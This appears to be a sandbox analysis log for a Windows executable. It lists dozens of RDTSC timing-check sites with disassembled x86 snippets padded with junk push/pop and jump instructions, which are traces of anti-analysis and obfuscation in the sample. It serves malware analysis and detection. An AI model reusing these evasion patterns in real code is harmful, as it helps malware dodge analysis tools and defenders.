                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D8B8CC second address: D8B8E9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FA944C70C91h 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D8B8E9 second address: D8B908 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA944B213F2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a jnl 00007FA944B213E6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D8BBCB second address: D8BC05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FA944C70C96h 0x0000000b push edx 0x0000000c pop edx 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jnc 00007FA944C70C8Ah 0x00000017 jnc 00007FA944C70C8Eh 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D8BC05 second address: D8BC0A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D8BD75 second address: D8BD90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA944C70C97h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D8BD90 second address: D8BDA6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edi 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 jnl 00007FA944B213E6h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D8BDA6 second address: D8BDB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007FA944C70C86h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D8C026 second address: D8C049 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA944B213EAh 0x00000007 jns 00007FA944B213EEh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D8C049 second address: D8C04E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D8C04E second address: D8C05B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 js 00007FA944B213E6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D8C44A second address: D8C46A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA944C70C92h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnp 00007FA944C70C86h 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D8C46A second address: D8C46E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D8C46E second address: D8C479 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D8AC74 second address: D8AC7E instructions: 0x00000000 rdtsc 0x00000002 jc 00007FA944B213ECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D8AC7E second address: D8AC85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D8AC85 second address: D8ACA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 jo 00007FA944B213E6h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jp 00007FA944B213EEh 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D96B39 second address: D96B3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D96B3E second address: D96B76 instructions: 0x00000000 rdtsc 0x00000002 js 00007FA944B213FDh 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FA944B213F5h 0x0000000f pushad 0x00000010 jng 00007FA944B213E6h 0x00000016 jmp 00007FA944B213EEh 0x0000001b pushad 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D5D4AB second address: D5D528 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 jmp 00007FA944C70C99h 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007FA944C70C88h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 00000017h 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 mov dword ptr [ebp+122D20FFh], edi 0x0000002c mov cx, dx 0x0000002f mov ecx, 0F8D13F1h 0x00000034 lea eax, dword ptr [ebp+12488230h] 0x0000003a sbb dx, F51Dh 0x0000003f mov dword ptr [ebp+122D1CFAh], ecx 0x00000045 nop 0x00000046 pushad 0x00000047 pushad 0x00000048 pushad 0x00000049 popad 0x0000004a jnl 00007FA944C70C86h 0x00000050 popad 0x00000051 jng 00007FA944C70C8Ch 0x00000057 popad 0x00000058 push eax 0x00000059 push esi 0x0000005a push eax 0x0000005b push edx 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D5D528 second address: D5D52C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D5D5BA second address: D5D5C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D5D5C0 second address: D5D5C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D5D97E second address: D5D984 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D5DC25 second address: D5DC2B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D5DC2B second address: D5DC4D instructions: 0x00000000 rdtsc 0x00000002 ja 00007FA944C70C88h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FA944C70C93h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D5DC4D second address: D5DC52 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D5DC52 second address: D5DC6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a adc edx, 1E5C8685h 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jne 00007FA944C70C88h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D5DEE1 second address: D5DF2D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebx 0x0000000b call 00007FA944B213E8h 0x00000010 pop ebx 0x00000011 mov dword ptr [esp+04h], ebx 0x00000015 add dword ptr [esp+04h], 00000017h 0x0000001d inc ebx 0x0000001e push ebx 0x0000001f ret 0x00000020 pop ebx 0x00000021 ret 0x00000022 mov edi, dword ptr [ebp+122D2916h] 0x00000028 add dword ptr [ebp+12464306h], esi 0x0000002e push 00000004h 0x00000030 jg 00007FA944B213ECh 0x00000036 nop 0x00000037 je 00007FA944B213F0h 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 pop eax 0x00000041 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D5E21F second address: D5E224 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D5E4CA second address: D5E51F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FA944B213EDh 0x0000000a popad 0x0000000b mov eax, dword ptr [eax] 0x0000000d pushad 0x0000000e jmp 00007FA944B213F7h 0x00000013 push esi 0x00000014 jmp 00007FA944B213F1h 0x00000019 pop esi 0x0000001a popad 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FA944B213EEh 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D5E620 second address: D5E62A instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA944C70C86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D5E62A second address: D5E687 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA944B213EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007FA944B213E8h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 00000019h 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 lea eax, dword ptr [ebp+12488230h] 0x0000002c mov ch, dh 0x0000002e push eax 0x0000002f jng 00007FA944B2140Bh 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007FA944B213F9h 0x0000003c rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D5E687 second address: D5E68B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D5E68B second address: D3DEBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 call dword ptr [ebp+122D20F8h] 0x0000000f push eax 0x00000010 push edx 0x00000011 jng 00007FA944B213EEh 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D3DEBF second address: D3DEC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D96E3B second address: D96E60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 push ebx 0x00000007 ja 00007FA944B213E8h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FA944B213F4h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D96E60 second address: D96E64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D97247 second address: D9724B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D9724B second address: D97257 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D9D20D second address: D9D23E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA944B213F7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a pushad 0x0000000b jnl 00007FA944B213E6h 0x00000011 pushad 0x00000012 popad 0x00000013 jnc 00007FA944B213E6h 0x00000019 popad 0x0000001a pushad 0x0000001b push ecx 0x0000001c pop ecx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D9D23E second address: D9D244 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D9C0E3 second address: D9C10A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA944B213F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jp 00007FA944B213E6h 0x00000010 push eax 0x00000011 pop eax 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D9C2BC second address: D9C2C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007FA944C70C86h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D9C565 second address: D9C569 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D9C569 second address: D9C58D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jns 00007FA944C70C86h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d jmp 00007FA944C70C8Fh 0x00000012 jg 00007FA944C70C8Ch 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D9C6C0 second address: D9C6C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D9C6C4 second address: D9C6C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D9C961 second address: D9C9AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FA944B213E6h 0x0000000a jmp 00007FA944B213EEh 0x0000000f jmp 00007FA944B213F4h 0x00000014 popad 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FA944B213F8h 0x0000001d push esi 0x0000001e pop esi 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D9CF65 second address: D9CF71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FA944C70C86h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D9CF71 second address: D9CF79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DA0D41 second address: DA0D5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FA944C70C86h 0x0000000a jnl 00007FA944C70C86h 0x00000010 popad 0x00000011 push ecx 0x00000012 jne 00007FA944C70C86h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DA0D5B second address: DA0D76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 jmp 00007FA944B213F2h 0x0000000d pop edi 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DA0D76 second address: DA0D87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA944C70C8Dh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DA0D87 second address: DA0D8D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DA30A5 second address: DA30AF instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FA944C70C86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DA30AF second address: DA30DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jbe 00007FA944B213E6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jl 00007FA944B2141Eh 0x00000014 jmp 00007FA944B213F7h 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DA30DE second address: DA30E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DA846F second address: DA848A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA944B213F5h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DA848A second address: DA84A4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop edi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jc 00007FA944C70CA8h 0x00000010 push eax 0x00000011 push edx 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 jbe 00007FA944C70C86h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DA935E second address: DA9362 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DAC539 second address: DAC53F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DAC53F second address: DAC543 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DAC543 second address: DAC549 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DABCCC second address: DABCD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DABFA2 second address: DABFAE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jne 00007FA944C70C86h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DAC2B8 second address: DAC2BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DB10DD second address: DB10F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA944C70C94h 0x00000007 pushad 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DB037E second address: DB0390 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 push edi 0x00000009 pop edi 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pop ebx 0x0000000e pushad 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DB04F6 second address: DB0505 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA944C70C86h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DB0A59 second address: DB0A5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DB0A5D second address: DB0A7C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FA944C70C8Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jo 00007FA944C70C8Eh 0x00000011 push esi 0x00000012 pop esi 0x00000013 jg 00007FA944C70C86h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DB0A7C second address: DB0A81 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DB0A81 second address: DB0A99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FA944C70C8Dh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DB0A99 second address: DB0A9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DB0C07 second address: DB0C0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DB0C0B second address: DB0C2A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA944B213F1h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b js 00007FA944B213E8h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DB757F second address: DB7598 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA944C70C94h 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DB7598 second address: DB75C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA944B213ECh 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push ecx 0x0000000e push edx 0x0000000f pop edx 0x00000010 jmp 00007FA944B213F2h 0x00000015 pop ecx 0x00000016 pushad 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DB7715 second address: DB7734 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA944C70C8Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jo 00007FA944C70C9Ch 0x0000000f pushad 0x00000010 jo 00007FA944C70C86h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DB7FDA second address: DB7FE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DB7FE0 second address: DB7FE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DB7FE4 second address: DB7FE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DB82CC second address: DB82ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FA944C70C99h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DB82ED second address: DB82F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DB8F2F second address: DB8F35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
